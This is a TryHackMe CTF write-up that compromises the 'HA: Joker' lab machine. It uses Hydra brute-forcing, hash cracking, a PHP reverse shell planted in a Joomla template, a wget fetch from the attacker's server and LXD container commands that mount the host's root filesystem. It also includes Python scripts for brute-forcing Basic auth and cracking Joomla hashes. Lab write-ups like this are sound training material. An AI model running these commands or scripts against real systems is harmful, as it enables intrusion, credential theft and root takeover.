HA Joker CTF TryHackMe Writeup | Xploit Ayush (2024)

Batman hits Joker.

Today, we will tackle a Boot to Root challenge named "HA: Joker". It was created for online penetration-testing practice and is not too difficult if you have a basic understanding of penetration testing. This write-up is for another TryHackMe CTF, themed around the Dark Knight (Batman) and the Joker. The challenge introduces a privilege-escalation technique that relies on LXD. In short, LXD is Canonical's container manager built on LXC: a container looks like a small virtual machine, but it shares the host kernel, and a user who is allowed to create containers can mount the host's filesystem into one and read or write it as root. We will work through enumeration, hash cracking, brute-forcing, exploitation and finally that LXD escalation. Let's start the machine and dive into the challenge.

This is a straightforward CTF training room that provides an opportunity to practice various skills. You will be able to practice enumeration, hash cracking, brute-forcing, exploitation, and privilege escalation. Have a great time and enjoy the challenge!

nmap -sV -sC -A -T4 10.10.83.156

This nmap command runs an aggressive scan (-A, which already turns on version detection -sV, default scripts -sC, OS detection and traceroute, so the explicit -sV -sC are redundant here) with the -T4 timing template against the target 10.10.83.156. The scan tells us which ports are open and which services and versions sit behind them, and that drives the next step of the penetration test.

Our nmap scan revealed three open ports on the target machine: 22 (SSH), 80 (HTTP) and 8080 (HTTP). Without any credentials the SSH port is of no use yet, so we set it aside and explore the two HTTP ports for potential vulnerabilities.

Nmap also reports Apache 2.4.29, the version shipped with Ubuntu 18.04. That tells us the likely operating system but gives us nothing directly exploitable, so we move on.

Port 80 serves a page with the Joker's face and can be accessed without a username or password. The next step is to enumerate the site for hidden files and directories with gobuster, which may turn up something worth exploiting:

gobuster dir -u http://<Machine IP> -w /usr/share/dirb/wordlists/common.txt -x txt,php,html,zip

We have found a hidden file named secret.txt through our enumeration process. It is now time to examine the contents of this file to gather additional information; beyond that, port 80 holds nothing else of interest.

Do not forget port 8080! There might be something interesting inside it. Unlike port 80, it answers with a 401 and an HTTP Basic authentication prompt, so we need credentials before we see any content. Based on the theme, we guess that the username might be "joker" and brute-force the password with Hydra's http-get module, which is the module for Basic auth:

hydra -l joker -P /usr/share/wordlists/rockyou.txt <Machine IP> -s 8080 http-get / -t 64

Hydra reports a hit as soon as a request stops coming back with 401. Note that -t 64 opens 64 parallel connections, which is fine against a lab VM but very noisy against anything real.

We have successfully obtained the login credentials for the site. Behind the Basic auth is what appears to be a CMS-based blog. Our next step is to search for directories and files within this port, in particular an admin directory, as it may contain sensitive information.
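The exchange Hydra's http-get module drives is simple enough to show end to end. The block below is an added example, not part of the original write-up: it starts a throw-away local web server that protects a path with HTTP Basic auth, confirms the target really is Basic auth (hydra aimed at the wrong module just reports nothing), and then runs a dictionary attack against it. The demo credentials, realm and wordlist are constructed for the example and are not the room's.

```python
"""Dictionary attack on HTTP Basic authentication, the same thing hydra http-get does.

Added example with a local demo server so it runs offline. DEMO_USER, DEMO_PASS
and DEMO_WORDLIST are invented for the demo.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from typing import Iterable, Optional

DEMO_USER, DEMO_PASS = "joker", "bananas"                 # constructed demo credentials
DEMO_WORDLIST = ["123456", "password", "batman", "bananas", "harley"]


class _BasicAuthHandler(BaseHTTPRequestHandler):
    """Minimal server side: 401 + WWW-Authenticate until the right Authorization arrives."""
    realm = "Joker's secret"

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{DEMO_USER}:{DEMO_PASS}".encode()).decode()
        if self.headers.get("Authorization") == expected:
            body, status = b"welcome", 200
        else:
            body, status = b"authentication required", 401
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", f'Basic realm="{self.realm}"')
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_demo_server() -> ThreadingHTTPServer:
    """Bind to an ephemeral loopback port and serve in a background thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _BasicAuthHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def try_basic(host: str, port: int, path: str, user: str, password: str) -> int:
    """One GET with an Authorization: Basic header; returns the HTTP status code."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers={"Authorization": "Basic " + token})
        return conn.getresponse().status
    finally:
        conn.close()


def brute_basic(host: str, port: int, path: str, user: str,
                wordlist: Iterable[str]) -> Optional[str]:
    """Return the first password that is not rejected with 401, or None."""
    # Sanity check first: an unauthenticated request must get a Basic challenge,
    # otherwise every candidate would look like a failure for the wrong reason.
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        challenge = resp.getheader("WWW-Authenticate", "")
        status = resp.status
    finally:
        conn.close()
    if status != 401 or not challenge.lower().startswith("basic"):
        raise RuntimeError(f"{path} is not protected by HTTP Basic auth (status {status})")
    for candidate in wordlist:
        if try_basic(host, port, path, user, candidate) != 401:
            return candidate
    return None


def demo() -> Optional[str]:
    """Spin up the demo server, attack it, tear it down; returns the recovered password."""
    srv = start_demo_server()
    try:
        return brute_basic("127.0.0.1", srv.server_address[1], "/", DEMO_USER, DEMO_WORDLIST)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("recovered password:", demo())
```

The pre-check is the part worth copying: Basic auth is identified by the WWW-Authenticate: Basic header on the 401, and a form-based login (or a 403) needs a different hydra module entirely.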

We have gained access to the site, and the favicon shows that it is running Joomla CMS. Next we run a Nikto scan, passing the Basic auth credentials with -id so that Nikto sees the same pages we do:

nikto -h http://10.10.83.156:8080/ -id joker:PASSWORD

Nikto revealed a robots.txt file and that /administrator/ redirects to the Joomla admin login. Both are useful: robots.txt often lists paths the owner wanted kept out of search engines, and /administrator/ is where any credentials we recover will be used.

Nikto also found a /backup.zip file. We do not have the Joomla admin credentials yet, but a site backup often contains the configuration or a database dump, so it is worth downloading (the Basic auth credentials are still needed to fetch it) and investigating.

The zip file is password protected. We convert it into a crackable hash with zip2john and run John the Ripper against that hash with the rockyou.txt wordlist; if the password is in the wordlist this reveals it and we can extract the contents.

The password for the zip file turned out to be the same as the one we obtained from the brute-force attack (password reuse, a finding in its own right). After extracting the archive we find two folders. One of them, the "db" folder, holds an SQL dump of the Joomla database, and the users table in that dump contains the Joomla super-user's username and password hash. Joomla 3.2 and later store passwords as bcrypt ($2y$) hashes, so the hash goes into John with the same rockyou.txt wordlist, and cracking it gives us the super-user password.
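Pulling the right fields out of a dump by hand is error prone, so here is an added example (not from the original write-up, and not Joomla's own code) that extracts every account from the *_users table of a mysqldump-style file, identifies the hash scheme, emits a john-style user:hash line, and runs a dictionary attack on the legacy md5(password + salt):salt scheme that older Joomla versions used. The real dump from backup.zip is not shown on the page, so a small dump is constructed inline; the usernames, the bcrypt placeholder and the demo password are invented. It assumes Joomla's default column order (id, name, username, email, password, ...) and one INSERT statement per line, which is what mysqldump produces.

```python
"""Extract Joomla account hashes from a SQL dump and triage them for cracking.

Added example; the sample dump below is constructed, not the room's backup.
"""
import hashlib
import re
from typing import Dict, Iterable, Iterator, List, Optional, Tuple

# mysqldump emits: INSERT INTO `<prefix>_users` VALUES (...),(...);  one statement per line
USERS_INSERT = re.compile(
    r"INSERT INTO `(\w+_users)`\s*(?:\([^)]*\)\s*)?VALUES\s*(.*?);(?=\r?\n|\Z)",
    re.IGNORECASE | re.DOTALL,
)
HEX32 = re.compile(r"[0-9a-f]{32}")


def iter_tuples(values: str) -> Iterator[str]:
    """Yield the inside of each top-level (...) in a VALUES clause, ignoring
    parentheses that sit inside quoted strings."""
    depth, in_str, start, i = 0, False, 0, 0
    while i < len(values):
        c = values[i]
        if in_str:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        elif c == "(":
            if depth == 0:
                start = i + 1
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                yield values[start:i]
        i += 1


def split_fields(row: str) -> List[str]:
    """Split one tuple body on commas, unquoting SQL strings and honouring \\ escapes."""
    fields, cur, in_str, i = [], [], False, 0
    while i < len(row):
        c = row[i]
        if in_str:
            if c == "\\" and i + 1 < len(row):
                cur.append(row[i + 1])
                i += 1
            elif c == "'":
                in_str = False
            else:
                cur.append(c)
        elif c == "'":
            in_str = True
        elif c == ",":
            fields.append("".join(cur).strip())
            cur = []
        else:
            cur.append(c)
        i += 1
    fields.append("".join(cur).strip())
    return fields


def extract_users(dump: str) -> List[Tuple[str, str, str]]:
    """(username, email, password_hash) for every row of every *_users table.
    Assumes Joomla's default column order: id, name, username, email, password, ..."""
    found = []
    for _table, values in USERS_INSERT.findall(dump):
        for row in iter_tuples(values):
            f = split_fields(row)
            if len(f) >= 5:
                found.append((f[2], f[3], f[4]))
    return found


def classify(h: str) -> str:
    """Name the hash scheme so the right cracker mode gets used."""
    if h.startswith(("$2y$", "$2a$", "$2b$")):
        return "bcrypt"            # Joomla 3.2+: john --format=bcrypt / hashcat -m 3200
    if ":" in h:
        digest, salt = h.split(":", 1)
        if HEX32.fullmatch(digest) and salt:
            return "md5-salted"    # Joomla 1.x/2.5: md5(password + salt):salt, hashcat -m 11
    if HEX32.fullmatch(h):
        return "md5"               # Joomla 1.0: unsalted md5, hashcat -m 0
    return "unknown"


def crack_legacy(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on md5(password + salt):salt. bcrypt is deliberately left to
    john/hashcat, which have a real bcrypt implementation."""
    digest, salt = h.split(":", 1)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hashlib.md5((word + salt).encode()).hexdigest() == digest:
            return word
    return None


def triage(dump: str, wordlist: Iterable[str]) -> List[Dict[str, Optional[str]]]:
    """Per account: scheme, a john-style 'user:hash' line, and the password if the
    legacy scheme fell to the wordlist."""
    words, out = list(wordlist), []
    for user, _email, h in extract_users(dump):
        kind = classify(h)
        cracked = crack_legacy(h, words) if kind == "md5-salted" else None
        out.append({"user": user, "kind": kind, "john_line": user + ":" + h, "cracked": cracked})
    return out


# Constructed sample. The bcrypt value is a placeholder of the right shape, not a
# real hash; the legacy hash is generated here from an invented demo password.
DEMO_PASSWORD, DEMO_SALT = "hannah", "Ab3dEf9hIjKlMnOp"
DEMO_LEGACY_HASH = hashlib.md5((DEMO_PASSWORD + DEMO_SALT).encode()).hexdigest() + ":" + DEMO_SALT
SAMPLE_DUMP = (
    "DROP TABLE IF EXISTS `joomla_users`;\n"
    "INSERT INTO `joomla_users` VALUES "
    "(447,'Super User','admin','admin@example.com',"
    "'$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234',"
    "0,1,'2019-10-08 12:00:00','2019-10-08 12:00:00','','',NULL,0,'','',0),"
    "(448,'O\\'Brien, Legacy','oldadmin','old@example.com','" + DEMO_LEGACY_HASH + "',"
    "0,0,'2012-01-01 00:00:00','2012-01-01 00:00:00','','',NULL,0,'','',0);\n"
)
DEMO_WORDLIST = ["123456", "batman", "harley", "hannah", "joker"]

if __name__ == "__main__":
    for entry in triage(SAMPLE_DUMP, DEMO_WORDLIST):
        print(entry)
```

The second sample row (an escaped quote and a comma inside a string) is there to show why a string-aware splitter is needed; a plain split on commas would misalign the columns and hand john the wrong field.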

With the super-user credentials we log in at /administrator/ and have full control of the Joomla instance. Joomla lets an administrator edit template PHP files from the browser, which amounts to code execution on the web server. We use the PHP reverse shell shipped with Kali Linux (/usr/share/webshells/php/php-reverse-shell.php). In the admin menu, go to Extensions, then Templates, open the beez3 template and choose Customise to get the file editor. Select index.php and replace its contents with the reverse-shell code, remembering to change the $ip and $port values to your attacker IP and listening port.

After editing index.php, click Save. The template's index.php now contains our reverse shell, and it runs whenever that file is executed by the server. To catch the connection we need a listener: start netcat on the port you put in the shell (nc -lvnp with that port), then trigger the shell by requesting the template file directly at http://<Machine IP>:8080/templates/beez3/index.php.

The shell we receive is a bare, non-interactive one, so we upgrade it to a proper TTY with the usual Python pty one-liner (python3 -c 'import pty; pty.spawn("/bin/bash")'). Running id shows that we are www-data, and that www-data is a member of the lxd group. Membership in lxd means we can create and configure containers through the LXD daemon, which itself runs as root, so this is our way to root.

To learn about LXD privilege escalation in detail, refer to the article "Lxd Privilege Escalation".

To escalate to root we first need an LXD image to launch a container from. Build one on the attacker machine (Kali Linux): clone saghul's lxd-alpine-builder repository from GitHub, change into the directory and run the build-alpine script, which downloads the latest Alpine packages and packs a minimal root filesystem into a compressed tarball that LXD can import (the script needs root, hence sudo):

Reference: the LXC / LXD documentation.

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

This produces an alpine-v*.tar.gz image in the builder directory (the exact name carries the Alpine version and build date). Now it has to reach the victim. First serve the directory from the attacker box with Python's built-in web server, which listens on port 8000 by default:

 
python3 -m http.server

Then, on the victim machine, go to /tmp, fetch the image from the attacker's web server and import it into LXD:

cd /tmp
wget http://<Attacker IP>:8000/<alpine-image>.tar.gz
lxc image import ./<alpine-image>.tar.gz --alias myimage
lxc image list
lxc init myimage pwn -c security.privileged=true
lxc config device add pwn mydevice disk source=/ path=/mnt/root recursive=true
lxc start pwn
lxc exec pwn /bin/sh
id

And I got root! The id command inside the container returns uid=0. Two settings make this work: security.privileged=true means the container's root is the host's real uid 0 rather than a user-namespaced one, and the disk device mounts the host's / at /mnt/root, so that root can read and write the entire host filesystem. Strictly this is a root shell inside the container rather than on the host, but with write access to /mnt/root the distinction rarely matters. The final file was located at /mnt/root/root, i.e. the host's /root directory. If lxc init complains that no storage pool exists, LXD was never initialised on the box; lxd init --auto sets up the defaults.

I found the flag file in that directory; its content is the answer to the final question.

Congratulations! You have completed a lab that exercised a whole chain of skills: service enumeration, web directory brute-forcing, Basic auth brute-forcing, zip and Joomla hash cracking, template-editing for code execution, and an LXD container escape to root. Well done!

Now that we have all the answers, let's submit them. CTF completed!

Keep Trying, Keep Working :)

Thank you for Reading!!

Happy Hacking
Follow me more to get more tips and tricks! 🙏
